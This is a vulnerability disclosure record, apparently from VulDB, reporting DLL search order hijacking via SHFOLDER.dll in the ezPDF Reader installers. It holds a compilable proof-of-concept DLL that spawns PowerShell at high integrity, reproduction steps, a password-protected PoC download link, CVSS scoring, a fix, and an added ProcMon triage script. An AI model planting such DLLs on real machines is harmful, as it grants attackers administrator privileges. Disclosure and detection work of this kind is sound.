| Title | Unidocs Inc. ezPDF DRM Reader / ezPDF Reader v3.0.0.4 / v2.0 Uncontrolled Search Path |
|---|
| Description | EMBARGO/CVE RESERVATION REQUEST: Despite the efforts I've made to notify the vendor of such vulnerabilities, no response has been received to date. I am requesting a CVE identifier reservation with a strict embargo. Please do not publish this entry or its technical details until April 11, 2026, or until the vendor officially releases a public patch, whichever occurs first.
The ezPDF_DRM_Reader_3.0.0.4.exe and ezPDFReader_setup.exe installers (both 32-bit) are vulnerable to DLL Search Order Hijacking due to an insecure search path. When executed, the installer attempts to load several system DLLs, including SHFOLDER.dll, without specifying a fully qualified path. Hence the application initially looks for the DLL in the Current Working Directory (CWD). A local, low-privileged attacker can place a malicious DLL with a matching name in the same directory as the installer (e.g., the user's Downloads folder). When the installer is run with administrator privileges, the malicious DLL is executed with High Integrity, allowing arbitrary code execution with administrative privileges.
Analysis (PoC):
To adhere to Coordinated Disclosure best practices and maintain the embargo, the complete Proof-of-Concept (including source code and exploit binary, screenshots, and videos) is hosted at the password-protected link below. I am also available to provide the source code directly via encrypted email if preferred.
You can download the PoC from the link below (password: ezpdfvulnerability)
=> https://gofile.me/7bU54/ZG47Lh7Yx
For environments where external file downloads are restricted, the following source code is provided for independent compilation and verification of the vulnerability.
###############################################################################################################################
/*
 * PoC: Local Privilege Escalation via DLL Search Order Hijacking
 * Purpose: Demonstrates successful code execution in a privileged context.
 * Verification: Spawns PowerShell to display User Identity and Token Privileges.
 */
#include <windows.h>

DWORD WINAPI Payload(LPVOID lpParam) {
    // Include 'hostname' and 'whoami' for a complete identity profile.
    WinExec("powershell.exe -NoExit -Command \"hostname; whoami; whoami /priv\"", SW_SHOW);
    return 0;
}

BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved) {
    switch (ul_reason_for_call) {
    case DLL_PROCESS_ATTACH:
        // CreateThread is used to ensure the host process doesn't hang while the PoC runs
        CreateThread(NULL, 0, Payload, NULL, 0, NULL);
        break;
    }
    return TRUE;
}
###############################################################################################################################
The vulnerability was validated on a clean installation of Windows 11 (latest build) hosted via Oracle VirtualBox v7.2.4. Verification was conducted using Process Monitor (ProcMon) to identify insecure library loading attempts. To simulate a real-world attack vector, the Proof of Concept (PoC) utilized two distinct security contexts: a low-privileged user account to plant the malicious payload and a high-privileged administrative account to execute the installer, confirming successful elevation of privilege.
Vulnerable File: ezPDF_DRM_Reader_3.0.0.4.exe / ezPDFReader_setup.exe
Target DLL: SHFOLDER.dll
Steps to Reproduce:
1. Create a malicious DLL named SHFOLDER.dll (SHFOLDER.cpp provided, 32-bit).
2. Place the malicious DLL in the same directory as ezPDF_DRM_Reader_3.0.0.4.exe or ezPDFReader_setup.exe.
3. Execute the installer.
4. Observe the execution of malicious code within a high-integrity process context.
Scoring:
CVSS v3.1: 7.3 (High)
Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H
CVSS v4.0: 7.3 (High)
Vector: CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
Mitigation:
The developer should call SetDefaultDllDirectories to restrict DLL loading to the system directory or use absolute paths when calling LoadLibrary. |
|---|
| Source | ⚠️ https://gofile.me/7bU54/ZG47Lh7Yx |
|---|
| User | RoyalSnek (UID 94373) |
|---|
| Submission | 01/11/2026 04:25 (3 months ago) |
|---|
| Moderation | 02/14/2026 20:42 (1 month later) |
|---|
| Status | Accepted |
|---|
| VulDB entry | 346107 [Unidocs ezPDF DRM Reader/ezPDF Reader 2.0/3.0.0.4 SHFOLDER.dll uncontrolled search path] |
|---|
| Points | 20 |
|---|
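
The ProcMon verification mentioned in the submission can be scripted for triage. The following is an added example, not part of the submission or the vendor's code: it scans a Process Monitor CSV export for DLL probes and loads by a given process outside the Windows system directories. The sample rows, the user name `alice`, the PIDs and the trusted-directory list are constructed assumptions.

```python
import csv
import io
from pathlib import PureWindowsPath

# Directories treated as trusted load locations (an assumption of this example).
TRUSTED = (r"c:\windows\system32", r"c:\windows\syswow64", r"c:\windows\winsxs")

# Constructed ProcMon CSV export covering two runs; not captured from the real installer.
SAMPLE = r'''"Time of Day","Process Name","PID","Operation","Path","Result","Detail"
"10:00:01.1","ezPDFReader_setup.exe","4100","CreateFile","C:\Users\alice\Downloads\SHFOLDER.dll","NAME NOT FOUND",""
"10:00:01.2","ezPDFReader_setup.exe","4100","Load Image","C:\Windows\SysWOW64\shfolder.dll","SUCCESS",""
"10:00:01.3","ezPDFReader_setup.exe","4100","CreateFile","C:\Users\alice\Downloads\license.txt","NAME NOT FOUND",""
"10:00:02.0","other.exe","900","CreateFile","C:\Users\alice\Downloads\SHFOLDER.dll","NAME NOT FOUND",""
"10:05:07.4","ezPDFReader_setup.exe","5200","Load Image","C:\Users\alice\Downloads\SHFOLDER.dll","SUCCESS",""
'''


def is_trusted(path):
    """True when the file's directory is one of TRUSTED or below it."""
    parent = str(PureWindowsPath(path).parent).lower()
    return any(parent == root or parent.startswith(root + "\\") for root in TRUSTED)


def triage(csv_text, process):
    """Return (kind, path) for DLL events of `process` outside trusted directories.

    kind is "probed" for a failed lookup (a name that could be planted there)
    and "loaded" for an image actually mapped from an untrusted directory.
    """
    findings = []
    reader = csv.DictReader(io.StringIO(csv_text.lstrip("\ufeff")))  # drop a BOM if present
    for row in reader:
        path = row["Path"]
        if row["Process Name"].lower() != process.lower():
            continue
        if not path.lower().endswith(".dll") or is_trusted(path):
            continue
        if row["Operation"] == "CreateFile" and row["Result"] == "NAME NOT FOUND":
            findings.append(("probed", path))
        elif row["Operation"] == "Load Image" and row["Result"] == "SUCCESS":
            findings.append(("loaded", path))
    return findings


if __name__ == "__main__":
    for kind, path in triage(SAMPLE, "ezPDFReader_setup.exe"):
        print(f"{kind:7} {path}")
```

A "probed" finding in a directory that standard users can write to marks a name that should be resolved by absolute path or restricted with SetDefaultDllDirectories; a "loaded" finding means a DLL from that directory was actually mapped into the process.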